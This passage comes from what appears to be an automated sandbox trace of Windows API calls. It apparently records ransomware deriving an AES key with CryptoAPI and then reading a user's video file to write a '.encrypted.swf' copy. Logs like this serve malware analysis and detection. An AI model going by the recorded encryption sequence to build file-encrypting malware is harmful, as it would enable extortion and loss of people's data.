| out: lpMsg=0x6ae38c) returned 0 [0042.735] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.735] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.735] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.735] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.735] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.735] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.736] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.736] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.736] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.736] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.736] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.736] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.736] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.736] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0042.737] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.737] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.737] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.737] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.737] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.737] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.737] CryptDestroyHash (hHash=0x7c2100) returned 1 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.737] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.737] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0042.737] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.737] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.737] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\urm8i1sk.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.738] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.738] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.738] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.739] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0042.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0042.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0042.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0042.740] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.encrypted.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\urm8i1sk.encrypted.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0042.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0042.741] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.742] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.742] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x8f41, lpOverlapped=0x0) returned 1 [0042.744] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8f41) returned 0xac2018 [0042.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8f41) returned 0xacaf68 [0042.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.745] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8f41) returned 0xac2018 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.746] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 